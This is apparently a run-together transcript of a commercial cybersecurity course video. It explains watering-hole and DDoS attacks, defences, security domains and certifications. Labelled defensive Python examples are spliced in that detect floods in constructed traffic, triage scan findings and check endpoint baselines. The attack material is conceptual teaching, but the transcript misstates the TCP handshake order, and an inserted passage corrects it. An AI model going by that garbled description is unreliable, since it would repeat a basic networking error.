after which the attackers infect a few of these websites with malware, and anyone who happens to visit the infected website will have their computer automatically loaded with malware. This attack loads the victim’s system with malware. Similar to the phishing attack, the malware in such an attack targets the personal information of the victim.

There is also a possibility that the hacker will actively take control of the infected computer. Let’s have a look at how we can prevent the watering hole attack. Just like most other cyber attack prevention methods, in this attack as well it is strongly suggested that you regularly update your software.

By doing so you can reduce the risk of this attack, as this attack most often exploits vulnerabilities. Also make sure to regularly check for any security patches. Make use of your network security tools to detect watering hole attacks; intrusion prevention systems work fine when it comes to detecting a suspicious act.

Similarly, you can conduct regular security checks using various network security tools. To prevent a watering hole attack, it is good to conceal your online activities. This can be done with the help of a VPN and also through your browser’s private browsing feature. A virtual private network, often called a

VPN, provides a secure connection to another network over the internet. It acts as a cover for your browsing activity. NordVPN is an example of a VPN that can be used to provide a secure connection. So that was all about the different types of cyber threats. Cyber security is implemented in order

to put a curb on these cyber attacks. Cyber security refers to the practice of protecting networks, computer systems and their components from unauthorized digital access. According to the Gartner forecast, it is stated that the worldwide spending on cyber security is forecasted to reach 133.7 billion dollars in 2022.

And according to the University of Maryland, hackers attack every 39 seconds, that is on average 2,244 times a day. Although we had a look at multiple methods to prevent a cyber attack, let’s once again have a look at a few personal tips and ways in which you can prevent a

cyber attack on the whole. Firstly, it is important that you change your passwords regularly, and not only change them but use strong passwords that are difficult to crack. Do not have extremely complicated passwords that you would tend to forget; rather, use a password with at least eight characters and preferably

alphanumeric. Also keep in mind not to use the same password twice. Next, update both the operating system and applications; this will remove vulnerabilities that hackers tend to exploit. Make use of antivirus protection software, as it prevents malware and other viruses from entering your device. Use antivirus software from

trusted and legitimate vendors only. Make sure to use a firewall, as it will filter the traffic entering your device. Use other network security tools such as intrusion prevention systems, access control, application security and so on. Fourthly, as mentioned in the earlier section, don’t open emails from unknown senders. Scrutinize the emails that you

receive and see where they come from and whether there are any grammatical or format errors. Ideally it is good to make use of a VPN; by doing so the traffic is encrypted between the VPN server and your device. This proves to be a protection for your device.

The next step is that you regularly back up your data. According to many security professionals, it is good to have three copies of your data on two different types of media, and one copy in an offsite location like cloud storage. This way, even if you witness a cyber

attack, you can erase your systems and restore from a recently performed backup. Up next is that you should train your employees in cyber security principles. They should also be aware of the various cyber threats and know how to tackle them in case of any emergency.

The next one is a crucial step, and that is to make sure to use two-factor or multi-factor authentication. Normally, by logging in you would enter your user ID and password, but with two-factor authentication users are required to provide two different authentication factors to verify themselves. It could be an additional

personal identification code or maybe even a fingerprint. When you are asked for more than two additional authentication methods apart from your username and password, it is termed multi-factor authentication. Thus it proves to be a better step to secure your account. Make sure to always secure your Wi-Fi

networks. The next point is to refrain from using public Wi-Fi without using a virtual private network, that is a VPN. Finally, it is also necessary that you safeguard your mobile, as mobiles are also a cyber attack target. For this purpose, install apps only from trusted and legitimate sources. Make sure

to keep your device updated, and there you go: those were a few of the cyber security tips and ways to prevent a cyber attack. Let’s start off with a few interesting facts about DDoS attacks. Cybercrime Magazine stated that the total number of DDoS attacks globally is anticipated to double to 14.5

million by 2022. Now that’s a huge number, isn’t it? Also, given the current situation with the COVID-19 pandemic, every sector is operating virtually; thus the attacks are growing more significantly than normal. Do you know the financial brunt a DDoS attack causes? Once again, according to Cybercrime Magazine, a denial of service

or DDoS attack could cost up to 120,000 dollars for a small company or more than 2 million dollars for a larger one. Along with financial loss, even reputation gets hampered. There are a few industries that are more susceptible to DDoS attacks, and according to the Cisco reports, the

online gaming and the gambling industry are a prime target. Now let me talk about a few real-life DDoS attacks that have happened in the past. Our first example is the DDoS attack faced by Dyn. Dyn is an internet performance management and web application security company that was acquired by Oracle in 2016.

On October 21st 2016, Dyn faced serious distributed denial of service attacks that targeted systems operated by DNS provider Dyn. The DDoS attack lasted roughly for a day, with spikes coming and going up to 1.5 terabits per second. Reports state that the attack was carried out using a weapon called the Mirai

botnet. About 10 to 20 percent of all the 500,000 or so known Mirai bots were involved, in addition to other devices. The findings revealed that Mirai was the primary source of malicious attack traffic. The attack affected a large number of users in North America and Europe. Several large businesses with high

traffic like Amazon, Quora, Airbnb, HBO, The New York Times, Twitter, Visa and CNN were affected. Our next example is Amazon Web Services, a subsidiary of Amazon which works on providing on-demand cloud computing platforms. In the month of February 2020, Amazon stated that AWS Shield observed and mitigated a 2.3 terabits per second

DDoS attack. AWS Shield, a managed DDoS protection service that is responsible for safeguarding applications running on AWS, mitigated this attack. The attack was carried out using hijacked CLDAP web servers and caused three days of elevated threat for its AWS Shield staff. The DDoS attack had a peak volume

of traffic of 2.3 terabits per second, which is the largest ever recorded. Detailing the attack in its Q1 2020 threat report, Amazon said its AWS Shield service mitigated the largest DDoS attack ever recorded, stopping a 2.3 terabits per second attack in mid-February this year. Now that we have

seen a few real-life DDoS attacks, let’s move on to understanding what exactly a DDoS attack is. You might have often come across the words denial of service attack, right? So is it the same as DDoS? Well, they differ with respect to a few parameters. A denial of service attack takes place

when a computer is used to flood the target server or network with traffic. By doing so, its resources and bandwidth are exhausted. The motive of the attack is to deny normal legitimate service requests and user access. As you can see in this image, we have the attacker’s computer sending traffic to

the target server here. Now let’s speak a bit about the DDoS attack. A DDoS attack works closely like a denial of service attack; the only difference is that here multiple systems are used to launch the attack. You can call a DDoS attack a large-scale attack operation based on a denial of service

attack. DDoS stands for distributed denial of service. Here several systems target a single system with malicious traffic. When multiple systems are used, the attacker can put the system offline more easily. A DDoS attack is faster than a normal denial of service attack, and DDoS attacks are difficult to trace.

From this image you can see that multiple systems are used to launch this attack. The systems together flood the target system with massive traffic. Now that we know what a DDoS attack is, let’s try and understand the motive behind these attacks. The first reason can be guessed well by

all of you, and that is ransom. Just like any other cyber attack, the primary reason is monetary gain. A website owner can be asked to pay a ransom for attackers to stop a DDoS attack. The ransom prices to stop the DDoS attacks vary from small amounts to hefty

amounts of money; in most cases the ransom is usually charged in bitcoins. The second reason is hacktivism or protest. Hacktivism occurs with the intention of spreading a message. The aim of this is usually to protest against an ideology or a political agenda. The targets of many hacktivist DDoS

attacks are government, financial or business websites. Attackers launch DDoS attacks to shut a website, say for a political reason, thus trying to make a statement. A person with a financial or an ideological motive is capable of damaging an organization by launching a DDoS attack against it. Lastly, these attacks can be carried out

for a specific reason, called targeted attacks. For example, it can be done to damage an organization’s reputation. It is to be noted that DDoS attacks can be deployed against big or small sites and can be driven by either competition or pure boredom, or also the need for a challenge.

The magnitude of these attacks can vary from small to big. Let’s now move on and understand a little more about the working of a DDoS attack. An attacker is required to gain control of a network of online machines in order to carry out a DDoS attack. Computers and various other IoT devices

are infected with malware, and these turn into a bot, also known as a zombie. A group of such bots is called a botnet. Once a botnet is created, the attacker takes over the remote control access. A DDoS is usually launched through a network of remotely controlled bots or

hacked computers. Botnets can range from hundreds to thousands of computers controlled by hackers. It is possible that your computer could be a part of a botnet without you even knowing it. The next step is to target the IP address of the victim by the botnet. Once this is done, each bot will bombard

their target with fake service requests. The botnets send more connection requests than a server can handle. In some cases they send huge volumes of data that exceed the bandwidth range of the victim. By doing so, the targeted server or network will overflow, thus resulting in a denial of service to normal traffic.

It is not possible to identify the bot, as it looks like a legitimate internet device. A successful DDoS attack slows a website and prevents users from accessing it, resulting in financial losses and performance issues. So now that you know how a DDoS attack is carried out, let’s have a look at the

types of DDoS attacks. Different DDoS attack vectors target the different components of a network connection. DDoS attacks can be divided into three types: they are volume-based attacks, protocol attacks and application layer attacks. Let’s have a look at each one of these attacks. First up we have the volume-based DDoS

attack. As the name suggests, this attack depends on the volume of the inbound traffic to the target. This attack aims at overloading the website’s bandwidth or causing usage issues. It creates congestion by consuming all the available bandwidth. Here massive volumes of data are sent to the victim

by using a form of amplification or requests from a botnet. It is very simple: the more the volume, the higher the success rate of the attack. The volume-based DDoS attacks include UDP floods, ping (that is ICMP) floods and other spoofed-packet floods. Now let’s have a look at an example of

the volume-based attack, that is the ping (ICMP) flood attack. The Internet Control Message Protocol (ICMP), which is utilized in a ping flood attack, is an internet layer protocol used by network devices to communicate. An ICMP flood attack, also known as a ping flood attack, is one of the most common

denial of service attacks. Here the attacker overwhelms the target device with ICMP echo requests. Basically, ICMP echo request and echo reply messages are used to ping a network device to check the connection between the sender and the receiver. An ICMP request requires resources and bandwidth to process and reply to the requests.

By flooding the target with request packets the network is forced to respond with an equal number of reply packets thus making it unserviceable to normal traffic attackers would usually spoof a bogus ip address in order to mask the sending device the next type of ddos attack we will be

Discussing is the protocol based attack when you learn networking you will know that the internet is based totally on a set of protocols protocol attacks cause a service disruption by consuming intermediate communication equipment like firewalls and load balancers ddos attacks based on protocols exploit weaknesses in layer 3 and layer 4

Protocol stacks protocol based attacks exploit your network by sending either more packets than what your server can manage or more bandwidth than what your network ports can hold this attack includes syn floods ping of death and smurf ddos to name a few here we will have a look at an example

Of the protocol based attack that is the syn flood attack here the attack exploits the tcp handshake in a regular tcp network transaction there is a three-way handshake namely the syn the acknowledgement and the syn acknowledgement the syn is a service request the ack that is also known as the

Acknowledgement is the response from the target and the syn acknowledgement is the original requester replying with something like a thanks in return whereas in the syn flood attack the syn packets are created with fake ip addresses by the attackers the target as per the protocol then sends an acknowledgement to the dummy address
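In the standard handshake the client sends SYN, the server answers SYN-ACK, and the client completes the connection with its ACK; a server under a SYN flood accumulates connections stuck waiting for that final ACK (half-open connections) until its backlog is exhausted. The following added example, which is not code from the course, shows how a defender can spot that condition from the server side by tracking handshake state per connection over a list of packet records. The server address, port and the packet capture are constructed sample data, and the backlog threshold is an assumption.

```python
# Added example (not from the course): spot SYN-flood behaviour by tracking the
# TCP handshake state of every connection to one server port from a list of
# packet records. The capture below is constructed; no real traffic is used.
from collections import Counter
from dataclasses import dataclass

SERVER = "10.0.0.5"   # assumed address of the protected web server
PORT = 80

@dataclass(frozen=True)
class Packet:
    ts: float     # seconds since start of capture
    src: str
    dst: str
    sport: int
    dport: int
    flags: str    # TCP flags as a string: "S" = SYN, "SA" = SYN-ACK, "A" = ACK

def handshake_states(packets, server=SERVER, port=PORT):
    """Map (client_ip, client_port) -> 'syn_sent' | 'synack_sent' | 'established'.

    A connection is half-open while the server has answered SYN-ACK but the
    client has not sent the final ACK; a SYN flood leaves many of those behind.
    """
    state = {}
    for p in packets:
        if p.dst == server and p.dport == port:          # client -> server
            key = (p.src, p.sport)
            if p.flags == "S":
                state[key] = "syn_sent"
            elif p.flags == "A" and state.get(key) == "synack_sent":
                state[key] = "established"
        elif p.src == server and p.sport == port and p.flags == "SA":  # server -> client
            key = (p.dst, p.dport)
            if state.get(key) == "syn_sent":
                state[key] = "synack_sent"
    return state

def summarize(packets, server=SERVER, port=PORT):
    """Count completed vs. half-open connections and the distinct sources behind them."""
    states = handshake_states(packets, server, port)
    half_open_sources = Counter(ip for (ip, _), st in states.items() if st != "established")
    return {
        "completed": sum(1 for st in states.values() if st == "established"),
        "half_open": sum(half_open_sources.values()),
        "half_open_sources": len(half_open_sources),
    }

def syn_flood_suspected(summary, backlog=128):
    """Alert when half-open connections approach the listen backlog, or when they
    dwarf completed ones. Per-source limits alone miss floods from spoofed,
    ever-changing addresses, so the aggregate count is what matters here."""
    return (summary["half_open"] >= backlog
            or summary["half_open"] > 10 * max(summary["completed"], 1))

def build_sample_capture():
    """Constructed traffic: three clients complete the handshake, then 200 SYNs
    arrive from spoofed sources that never answer the server's SYN-ACK."""
    pkts, t = [], 0.0
    for i, client in enumerate(["192.0.2.10", "192.0.2.11", "192.0.2.12"]):
        sport = 40000 + i
        pkts += [Packet(t, client, SERVER, sport, PORT, "S"),
                 Packet(t + 0.001, SERVER, client, PORT, sport, "SA"),
                 Packet(t + 0.002, client, SERVER, sport, PORT, "A")]
        t += 0.01
    for i in range(200):
        spoofed, sport = f"198.51.100.{i + 1}", 50000 + i
        pkts += [Packet(t, spoofed, SERVER, sport, PORT, "S"),
                 Packet(t + 0.0005, SERVER, spoofed, PORT, sport, "SA")]
        t += 0.001
    return pkts

if __name__ == "__main__":
    s = summarize(build_sample_capture())
    print(s, "SYN flood suspected:", syn_flood_suspected(s))
```

The per-source count is reported but the alert is driven by the aggregate, because each spoofed source in the sample appears only once; a real sensor would also expire entries after the server's SYN-ACK retransmission timeout so that normal slow clients do not accumulate forever.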

Unfortunately this dummy address never responds this is carried out a number of times the target waits for the final step in the handshake and in turn it exhausts its resources in the process next up we have the application layer attack the main motive of this attack is

To bring down an online service or a website these attacks are comparatively smaller but silent application layer attacks are also known as layer 7 attacks and they not only target the application but also the network and its bandwidth application layer attacks include get and post floods low and slow attacks and

More let’s have a look at the famous http flood attack as an example http flood is a type of distributed denial of service attack in which the attacker exploits legitimate looking http get or post requests to attack a web server or an application here large numbers of http requests

Flood the server resulting in denial of service http has generally two types of requests get or post a get request is used to retrieve information while a post request is often used when submitting a completed web form or when uploading a file usually http flood attacks are harder to detect and block

An http flood attack sends what appears to be legitimate http get or post requests to attack a web server or an application these flooding attacks often rely on a botnet now that we have had a look at the types of ddos attacks let’s understand the measures we need to take up in order to

Prevent these attacks the first step is to acquire more bandwidth you must make sure that you have ample bandwidth to handle any spikes in traffic caused due to malicious activity currently with attackers being more careful having more bandwidth raises the bar which the attackers have to overcome before launching a successful ddos

Attack this is a good preventive step next make sure to have a ddos response plan ready usually when a ddos attack takes place there is very little time to plan hence it is wise to define a plan in advance as it will avoid and minimize any impacts

To do this job first you would have to develop an incident response plan also make sure your data center is prepared and your team knows what to do the standard key elements include a system checklist forming a response team which should include the list of internal and external contacts as well

And the last being securing your network infrastructure this can be done with the help of ips that is intrusion prevention systems which combine firewalls vpn load balancing and other layers of ddos defense techniques our third point is to configure network hardware against an attack at times small hardware configuration changes can

Help you prevent a ddos attack this is most often overlooked also make sure to protect your dns servers as attackers can take your website and web servers offline by attacking your dns servers next point is to leverage the cloud the conventional ddos mitigation solutions oversize the network bandwidth and

Require complex hardware which proves to be costly and also ineffective whereas cloud has greater bandwidth and resources cloud-based apps can absorb malicious traffic way before it reaches its intended destination therefore it is good to outsource ddos prevention to cloud-based service providers our fifth point involves monitoring your website traffic regularly for unusual activities

It is a great thing if your website gets millions of new visitors in an hour but isn’t that also suspicious a sudden increase in traffic is an alarming situation hence have alerts set up in the event you exceed a threshold specific to the number of requests targeting your site

Considering the time and place of the inbound traffic is also a good step a ddos attack usually gives a few red flags before it happens your team should be wise enough to spot them beforehand the signs of such an attack for example will be your website being unresponsive or responding slowly intermittent

Website shutdowns or probably the user having problems accessing the website if these issues are prolonged then the network is likely experiencing a ddos and an action should be taken immediately the next step is to keep everything up to date this might sound basic but it goes a long way all the systems should

Be kept up to date to make sure that any issues or bugs are fixed it is always good to detect threats at an early stage finally you can make use of ddos prevention tools like imperva cloudflare f5 networks arbor ddos and black lotus to name a few

These tools are very effective for example layer 3 and 4 protection absorbs an attack before it reaches the target server this is not achievable by using firewalls load balancers and routers taking arbor ddos as an example it is to be noted that it can deal with large volumes of malicious traffic without
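Before reaching for a commercial product, the request-threshold alerting described above (and the http get/post flood pattern described earlier) can be prototyped over the web server's own access log. The following added example is not code from the course or from any of the named vendors: it parses constructed access-log lines, compares each minute's volume against an assumed per-hour baseline (the "time of the inbound traffic" point), and separately flags any single address that exceeds a per-source limit. The log lines, addresses, baseline rate and thresholds are all constructed for the example.

```python
# Added example (not from the course): threshold-based alerting over web server
# access logs, the kind of "unusual activity" monitoring the text recommends.
# The log lines are constructed; the baseline numbers are assumed, not measured.
import re
from collections import Counter
from datetime import datetime

# Common/combined log format; only the fields needed for rate analysis are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "minute": ts.strftime("%Y-%m-%dT%H:%M"), "hour": ts.hour,
            "method": m["method"], "path": m["path"], "status": int(m["status"])}

def detect_http_flood(lines, baseline_rpm_by_hour, default_rpm=30,
                      surge_factor=5.0, per_source_limit=60):
    """Two checks per minute of traffic:
    - volume_surge: total requests exceed surge_factor x the expected rate for
      that hour of day (catches a botnet whose members each stay under the radar);
    - source_rate: a single address exceeds per_source_limit requests.
    """
    per_minute, per_source, hour_of = Counter(), Counter(), {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        per_minute[rec["minute"]] += 1
        per_source[(rec["minute"], rec["ip"])] += 1
        hour_of[rec["minute"]] = rec["hour"]
    alerts = []
    for minute, total in sorted(per_minute.items()):
        expected = baseline_rpm_by_hour.get(hour_of[minute], default_rpm)
        if total > surge_factor * expected:
            alerts.append(("volume_surge", minute, total))
    for (minute, ip), n in sorted(per_source.items()):
        if n > per_source_limit:
            alerts.append(("source_rate", minute, ip, n))
    return alerts

def build_sample_log():
    """Constructed log: one quiet minute, then one minute with a distributed GET
    flood (100 sources, 4 requests each) plus one address hammering a form."""
    def line(ip, hhmm, method, path):
        return f'{ip} - - [10/Oct/2020:{hhmm}:00 +0000] "{method} {path} HTTP/1.1" 200 512'
    legit = ["192.0.2.10", "192.0.2.11", "192.0.2.12", "192.0.2.13", "192.0.2.14"]
    lines = [line(legit[i % 5], "13:55", "GET", f"/page/{i}") for i in range(20)]
    lines += [line(f"198.51.100.{i % 100 + 1}", "13:56", "GET", "/index.html") for i in range(400)]
    lines += [line("203.0.113.77", "13:56", "POST", "/login") for _ in range(100)]
    return lines

def run_detection():
    # Assumed baseline: this site normally sees about 30 requests/minute at 13:00 UTC.
    return detect_http_flood(build_sample_log(), baseline_rpm_by_hour={13: 30})

if __name__ == "__main__":
    for alert in run_detection():
        print(*alert)
```

The distributed part of the flood in the sample never trips the per-source limit (four requests per bot), which is why the volume check against a time-of-day baseline is the one that catches it; the single chatty address is caught by the per-source check. In production the baseline would come from historical traffic rather than a hard-coded dictionary.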

Disrupting the regular traffic this software is used to mostly protect enterprise or web hosting services now let’s have a look at something interesting we will speak a bit about the digital attack map as you see on your screens it is a data visualization of ddos attacks across the

World it is built through a collaboration between google ideas and arbor networks you can have a look at it and explore the various features it has like which part of the world and when a ddos attack is happening you can also get all the stats related to the attack

Digital attack map lets you learn about past trends and find reports of outages happening on a given day make sure to check this out now that you know all about a ddos attack and if you are interested in becoming a cyber security expert and want to work on designing security

Systems and prevent cyber attacks then simplilearn can help you achieve your dreams simplilearn provides a cyber security expert master’s program with foundational intermediate and advanced security skills through leading certification courses including security plus ceh cism cissp and ccsp with the increasing number of job opportunities in the field of cyber

Security this certification course will prove to be an advantage there are no prerequisites for this program however knowledge of any programming language is recommended but again not mandatory let’s see how we become a cyber security expert so essentially who is a cyber security expert a cyber security expert is an

Individual employed by an organization to protect their infrastructure right so this person is responsible to identify potential flaws identify what threats the organization faces and then streamline or create or design or architect methodology which is going to protect all the assets that the organization has so this is going to

Happen through a variety of techniques such as finding weaknesses so vulnerability management where you run vulnerability scanners identify potential flaws in the organization’s infrastructure could be applications could be servers could be desktops could be operating systems could be anything could be network-based flaws as well and then

You’re going to monitor these systems you’re going to look at the data flow that is going to the internet through the network to the intranet rather and then you’re going to check if there is anything malicious going on in that network so over these techniques you’re basically

Going to monitor it on a day-to-day basis on a regular basis and you’re going to try to identify if anything out of the ordinary is happening right after you find the weaknesses you’re going to test those weaknesses to identify the complexity of those weaknesses to validate that those weaknesses actually exist and then

You’re going to repair them you’re going to patch them you’re going to install updates or you’re going to install mechanisms like firewalls or antiviruses to mitigate those weaknesses thus resulting in strengthening the areas where an attack may have occurred
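The find, validate, then fix cycle just described produces a queue that has to be ordered somehow, since a scanner reports far more than a team can patch at once. The following added example, which is not code from the course, turns constructed scanner findings into a prioritized remediation list: it removes duplicate reports of one flaw, bands each finding by CVSS score with an extra point for internet exposure, puts manually validated findings ahead of unvalidated ones within a band, and assigns a due date from an assumed per-severity SLA. Hosts, check names, scores and SLA windows are all constructed.

```python
# Added example (not from the course): turn raw vulnerability-scanner findings into
# a prioritized remediation queue. Findings, hosts and SLA windows are constructed.
from dataclasses import dataclass
from datetime import date, timedelta

@dataclass(frozen=True)
class Finding:
    host: str
    check: str             # name of the scanner check that fired (constructed)
    cvss: float            # CVSS base score, 0.0 - 10.0
    internet_facing: bool  # is the host reachable from the internet?
    validated: bool        # has a manual test confirmed the flaw is real?

# Assumed remediation deadlines per severity band (days); adjust to your policy.
SLA_DAYS = {"critical": 7, "high": 30, "medium": 90, "low": 180}
_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}

def severity(f: Finding) -> str:
    """Band the CVSS score, adding one point for internet exposure so reachable
    hosts are fixed before equally-scored internal ones."""
    score = min(10.0, f.cvss + (1.0 if f.internet_facing else 0.0))
    if score >= 9.0:
        return "critical"
    if score >= 7.0:
        return "high"
    if score >= 4.0:
        return "medium"
    return "low"

def triage(findings, today: date):
    """De-duplicate, band and order findings; validated flaws come first within a band."""
    seen, queue = set(), []
    for f in findings:
        key = (f.host, f.check)
        if key in seen:          # scanners often report one flaw from several checks
            continue
        seen.add(key)
        sev = severity(f)
        queue.append({"host": f.host, "check": f.check, "severity": sev,
                      "validated": f.validated,
                      "due": today + timedelta(days=SLA_DAYS[sev])})
    queue.sort(key=lambda r: (_ORDER[r["severity"]], not r["validated"], r["host"]))
    return queue

SAMPLE_FINDINGS = [  # constructed scanner output
    Finding("web-01", "TLS 1.0 enabled", 5.3, True, False),
    Finding("web-01", "TLS 1.0 enabled", 5.3, True, False),       # duplicate report
    Finding("web-01", "default admin credentials", 9.8, True, True),
    Finding("db-01", "missing vendor patch", 8.1, False, False),
    Finding("file-01", "version banner disclosure", 3.1, False, False),
]

def sample_queue():
    """Run the triage over the constructed findings from a fixed reference date."""
    return triage(SAMPLE_FINDINGS, date(2021, 1, 4))

if __name__ == "__main__":
    for item in sample_queue():
        print(item["severity"].upper(), item["host"], item["check"], "due", item["due"])
```

The exposure bump is the part worth debating with your own team: the same flaw on an internal database and on an internet-facing web server is not the same risk, and encoding that in the triage rule is what makes the output defensible when a business owner asks why their ticket is at the top.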

Let’s see the domains in cyber security now when we say domains in cyber security in the previous slide we were discussing where these attacks may happen like applications infrastructure network so let’s see these domains in detail asset security now when we say assets assets could be applications

Could be networking devices could be computers could be routers it could be wireless access points and all these devices have their own operating systems they have their own functionality and it is important that we look at the security of each and every asset that the organization owns security

Architecture and engineering now not everyone can just walk into an organization and say let’s start implementing security in a particular manner we have to standardize the security in such a way where the security is constant for a long period of time and is consistent

Right so for that to happen there is an architecture an engineering phase where we are going to create a plan of how the security needs to be implemented for example if i determine to install a particular antivirus i have to ensure that the same antivirus is installed on

All the systems in the organization i cannot have different kind of antiviruses installed that do not talk to each other or do not report properly to the proper owner so we have to create policies procedures and we have to implement them in a standardized manner for our security to work properly
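The antivirus point above is really a policy-as-code problem: once the standard is written down, compliance with it can be checked automatically against the asset inventory instead of by hand. The following added example, which is not code from the course, checks a constructed fleet inventory against one baseline (a single approved endpoint agent, a minimum version, and one management console everything must report to) and lists each deviation. The product name, console hostname, version numbers and host names are placeholders invented for the example.

```python
# Added example (not from the course): check a fleet inventory against one
# standardized endpoint-protection baseline. Product, console and host names are
# constructed placeholders; the inventory is sample data.
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Host:
    name: str
    agent: Optional[str]          # endpoint protection product found by inventory
    agent_version: Optional[str]
    reports_to: Optional[str]     # management console the agent checks in with

# The agreed baseline: one product, a minimum version, one console it must report to.
BASELINE = {
    "agent": "ExampleEDR",                    # placeholder product name
    "min_version": "4.2.0",
    "console": "edr-console.corp.example",    # placeholder hostname
}

def parse_version(v: str):
    """'4.10.1' -> (4, 10, 1), so comparisons are numeric, not lexical."""
    return tuple(int(part) for part in v.split("."))

def check_host(host: Host, baseline=BASELINE):
    """Return the list of baseline violations for one host (empty = compliant)."""
    if host.agent is None:
        return ["no endpoint agent installed"]
    problems = []
    if host.agent != baseline["agent"]:
        problems.append(f"non-standard agent {host.agent}")
    elif parse_version(host.agent_version) < parse_version(baseline["min_version"]):
        problems.append(f"agent version {host.agent_version} below {baseline['min_version']}")
    if host.reports_to != baseline["console"]:
        problems.append(f"reports to {host.reports_to or 'nothing'} instead of {baseline['console']}")
    return problems

def compliance_report(hosts, baseline=BASELINE):
    """Map each non-compliant host to its violations, plus the fleet compliance rate."""
    violations = {h.name: check_host(h, baseline) for h in hosts}
    failing = {name: v for name, v in violations.items() if v}
    rate = (len(hosts) - len(failing)) / len(hosts) if hosts else 1.0
    return {"failing": failing, "compliance_rate": rate}

SAMPLE_FLEET = [  # constructed inventory
    Host("ws-01", "ExampleEDR", "4.3.1", "edr-console.corp.example"),
    Host("ws-02", "ExampleEDR", "4.1.9", "edr-console.corp.example"),
    Host("ws-03", "OtherAV", "2021.2", "other-console.corp.example"),
    Host("srv-01", None, None, None),
    Host("srv-02", "ExampleEDR", "4.2.0", None),
]

if __name__ == "__main__":
    report = compliance_report(SAMPLE_FLEET)
    for host, problems in report["failing"].items():
        print(host, "->", "; ".join(problems))
    print(f"fleet compliance: {report['compliance_rate']:.0%}")
```

Note the srv-02 case: the right product at the right version is still a finding if it does not report to the central console, because an agent nobody can see alerts from does not give the organization the consistent picture the text is asking for.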

Communication and network security now with cloud computing coming in and hybrid clouds happening where you got a deployment of a physical infrastructure talking to something that is on the cloud let’s say aws or microsoft azure right and data flows are happening globally these days you have to be

Very careful how this data is going to be transmitted across the network thus you have to create those paths and ensure that those paths are monitored properly are regulated properly and do not have any data leakages similarly identity and access management who is accessing my data are they authorized to

Access my data and if yes how am i going to authenticate them how am i going to track them how am i going to hold them accountable for whatever they have done even if a person is authorized to do something we have to hold them accountable for that activity so that if

Something something happens later on we can identify who made that change so the identity and access management module will consist of us creating groups policies users roles and interlinking them with the assets to ensure that only authorized people are able to access those devices security operations on a

Day-to-day basis we need to monitor the security of the organization for example if today i start facing a denial of service attack or somebody starts a password attack on my organization where they’re trying to crack somebody’s password there should be some internal mechanisms that are in place which will

Try to identify these attacks warn the appropriate administrator and that administrator will walk in and try to investigate that attack so day-to-day operations are a must security assessment and testing now that we have all these mechanisms in place are they going to remain constant for the

Rest of our lives no i.t is an ever evolving scenario so we need to assess and test our security controls on a regular basis to ensure that there are no gaps left what i configure today may be irrelevant tomorrow so i have to constantly keep on looking at the latest

Security trends the latest vulnerabilities that are being identified the patches that are being installed and i have to compare my infrastructure to all of these to see that i am compliant with the latest security standards software development security so if you’re an organization who’s developing software and who’s

Going to sell that software to end users security becomes a huge part because the end user or the buyer if it is an organization is going to ask what kind of security testing was done in the application so that brings us to a software development

Life cycle which talks about how you’re going to create that code how you’re going to test that code ensure that the code is secure enough so you need to follow secure coding practices and you’re going to test the software over and over again till you are satisfied

With the outcome and then security and risk management now when we come to risks risks are basically events that may occur compromising the security of an organization so it is very important that we identify these risks we map these risks we verify how that risk is going to impact the business and then

Try to figure out security controls to mitigate that risk or bring it down to manageable aspects so that’s a lot of talk that’s a lot of domains that’s a lot of attacks that we have discussed now let’s see what kind of courses and certifications are available for us to enhance our careers

And address all of these domains all of these attacks so starting off from a technical perspective where we are going to look at ethical hacking or security where we are going to assess and do a vulnerability assessment and penetration test there are certifications from comptia like security plus or from ec council

Which is the certified ethical hacking training which basically allows us to become vulnerability assessment and penetration testing experts so we’ll be technically be testing each and every device and trying to hack those devices to see if that vulnerability is real and what can be attained out of that

Vulnerability cissp is a very high level certification that normally is considered as a management level certification right so just to get yourself certified you need at least 5 years of experience in the it security field this is where you get certified and you’re basically a chief information

Security officer where you’re going to develop policies procedures and security control mechanisms and you’re going to standardize the security policy of the entire organization then you’ve got the cisa the certified information systems auditor it is from an organization called isaca it’s more on the system side where

You’re going to audit systems and you’re going to verify that they are adhering to the policies that you have implemented the cism is the certified information security manager this is again a project based oriented approach where you’re going to manage the security of an organization and you’re going to look

At all the daily operations of the security operations center and you’re going to maintain and manage all of those functions overall when we talked about risk assessment and risk strategy for that we’ve got the crisc which is certified in risk and information systems control now for these

Certifications this is more on the business side of everything where you understand the business processes you understand the business requirements and based on those business requirements you compare the technical implementations of computing power that you have implemented and then you are going to compare how those technical aspects

Can be converted into a risk for example a vulnerability assessment identifies a possible sql injection attack now technically it becomes a big risk however which system is being affected if that system gets compromised what kind of losses is the organization looking at

Are they looking at lawsuits from their customers are they looking at penalties from regulatory authorities so that implied risk if this vulnerability is exploited that is the aspect that you want to look at when

You’re looking at risk information and controls similarly you have ccsp this is a certified cloud security professional certification so this is especially for people who want to deal with the cloud let it be a public cloud a private cloud or a hybrid cloud this certification gives you an architectural overview over different

Aspects of cloud and how you want to implement security in a cloud-based scenario so simplilearn offers all of these certifications with trainings from certified professionals so there’s a master’s program from simplilearn which talks about becoming a cybersecurity expert which includes all of these trainings once you have these kind of trainings

And you get those certifications on your profile that’s where you’re basically a cyber solutions or cyber security expert and you’ll be designing and developing security policies structures architectures for various organizations and helping them enhance the security of their infrastructure we humans are highly tech savvy in today’s times

With the extensive use of the internet and modern technologies there is a massive challenge in protecting all our digital data such as net banking information account credentials and medical reports to name a few have you heard about the deadly wannacry ransomware attack the attack happened in may 2017 in asia

And then it spread across the world within a day more than 230 000 computers were infected across 150 countries the wannacry cryptoworm encrypted the data and locked the users out of their systems for decryption of the data the users were asked for a ransom of 300 to 600 dollars in bitcoin

The users who use the unsupported version of microsoft windows and those who hadn’t installed the security update of april 2017 were targeted in this attack the wannacry attack took a toll on every sector top tier organizations like hitachi nissan and fedex had to put their businesses on hold as their

Systems were affected too now this is what you call a cyber attack to prevent such attacks cyber security is implemented we can define cybersecurity as the practice of protecting networks programs computer systems and their components from unauthorized digital attacks these illegal attacks are often referred to as hacking hacking refers to exploiting weaknesses

